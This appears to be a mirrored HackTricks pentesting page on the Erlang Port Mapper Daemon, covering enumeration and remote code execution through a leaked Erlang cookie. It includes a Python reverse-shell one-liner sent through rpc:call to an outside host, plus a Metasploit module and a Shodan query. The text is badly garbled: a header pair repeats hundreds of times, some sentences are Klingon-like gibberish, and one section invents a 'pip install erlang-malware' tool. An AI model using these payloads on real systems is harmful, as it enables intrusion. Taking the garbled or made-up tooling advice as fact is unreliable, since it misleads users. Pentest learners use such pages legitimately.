mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-28 15:41:34 +00:00
23 KiB
23 KiB
htARTE (HackTricks AWS Red Team Expert) !HackTricks!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Info
The Erlang Port Mapper Daemon (epmd) serves as a coordinator for distributed Erlang instances. It is responsible for mapping symbolic node names to machine addresses, essentially ensuring that each node name is associated with a specific address. This role of epmd is crucial for the seamless interaction and communication between different Erlang nodes across a network.
Default port: 4369
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
Manual
Enumeration
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369
#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
apt-get install erlang
erl #Once Erlang is installed this will promp an erlang terminal
1> net_adm:names('<HOST>'). #This will return the listen addresses
Qapmey
The Erlang Port Mapper Daemon (EPMD) is a service that runs on port 4369 by default and is used by Erlang distributed systems to facilitate communication between nodes. EPMD is responsible for registering and unregistering nodes, as well as providing information about the nodes running on a network.
During a pentest, it is important to identify and exploit any vulnerabilities in EPMD to gain unauthorized access to the Erlang distributed system. One way to automate this process is by using the epmd_discover tool from the erlang-malware project.
epmd_discover is a Python script that leverages the epmd module to scan a network for EPMD services. It can be used to discover running Erlang nodes, gather information about them, and potentially exploit any vulnerabilities found.
To use epmd_discover, follow these steps:
- Install the required dependencies by running the following command:
pip install erlang-malware
- Run the
epmd_discoverscript with the target IP address or range as an argument:
epmd_discover <target_ip>
The script will scan the specified IP address or range for open EPMD ports and display information about any discovered Erlang nodes.
By automating the discovery and enumeration of EPMD services, the epmd_discover tool can save time and effort during a pentest, allowing for more efficient identification and exploitation of vulnerabilities in Erlang distributed systems.
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
| epmd-info:
| epmd_port: 4369
| nodes:
| bigcouch: 11502
| freeswitch: 8031
| ecallmgr: 11501
| kazoo_apps: 11500
|_ kazoo-rabbitmq: 25672
Erlang Cookie RCE
Remote Connection
If you can leak the Authentication cookie you will be able to execute code on the host. Usually, this cookie is located in ~/.erlang.cookie and is generated by erlang at the first start. If not modified or set manually it is a random string [A:Z] with a length of 20 characters.
Erlang Cookie RCE
Remote Connection
If you can leak the Authentication cookie you will be able to execute code on the host. Usually, this cookie is located in ~/.erlang.cookie and is generated by erlang at the first start. If not modified or set manually it is a random string [A:Z] with a length of 20 characters.
greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]
Eshell V8.1 (abort with ^G)
At last, we can start an erlang shell on the remote system.
(test@target.fqdn)1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"
https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ jImej.
vItlhutlh 'oH 'ej program share brutforce cookie:
{% file src="../.gitbook/assets/epmd_bf-0.1.tar.bz2" %}
Local Connection
qaStaHvIS CouchDB vItlhutlh: 'ej vItlhutlh locally:
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
Example taken from https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution
Canape HTB machine vuln exploit practice use can.
Metasploit
#Metasploit can also exploit this if you know the cookie
msf5> use exploit/multi/misc/erlang_cookie_rce
Shodan
port:4369 "at port"
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.